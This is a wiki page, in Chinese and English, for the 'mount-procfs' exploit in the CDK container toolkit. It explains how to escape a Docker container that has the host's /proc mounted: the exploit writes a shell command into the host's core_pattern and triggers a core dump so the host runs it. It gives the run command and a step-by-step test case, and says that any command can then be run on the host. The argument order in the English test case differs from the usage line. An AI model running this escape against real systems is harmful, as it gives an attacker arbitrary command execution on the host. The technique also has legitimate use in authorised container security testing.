Skip to content

Exploit: mount procfs

cdxy edited this page Apr 13, 2021 · 2 revisions

Exploit: mount-procfs


该脚本将用户指定的shell命令指向宿主机/sys/kernel/core_pattern文件,在容器空间通过segment fault触发core dump,进而触发shellcode执行。

Automatic escape container which mounts host process filesystem (usually /proc dir).

This exploit will first point user-defined shell cmd to host /sys/kernel/core_pattern file, then use runtime segment fault to trigger core dump inside container, and the shell code will be executed by target host.

See Also:


cdk run mount-procfs <proc-dir> "<shell-cmd>"
# after exploit, the target host will execute user-specified commands in <shell-cmd> arg.



  1. 宿主机启动测试容器,挂载宿主机的procfs,尝试逃逸当前容器。docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc --rm -it ubuntu bash
  2. 容器内部执行 ./cdk run mount-procfs /mnt/host_proc "touch /tmp/exp-success"
  3. 宿主机中出现/tmp/exp-success文件,说明exp已经成功执行,攻击者可以在宿主机执行任意命令。

Testing Case

  1. run a container in host docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc --rm -it ubuntu bash, try to escape this container using CDK.
  2. attach into the container and execute ./cdk run /mnt/host_proc mount-procfs "touch /tmp/exp-success"
  3. back to the host, check /tmp/exp-success file exists, which means our shell cmd was executed successfully. by modifying <shell-cmd> arg you can exec any cmd you want in target host.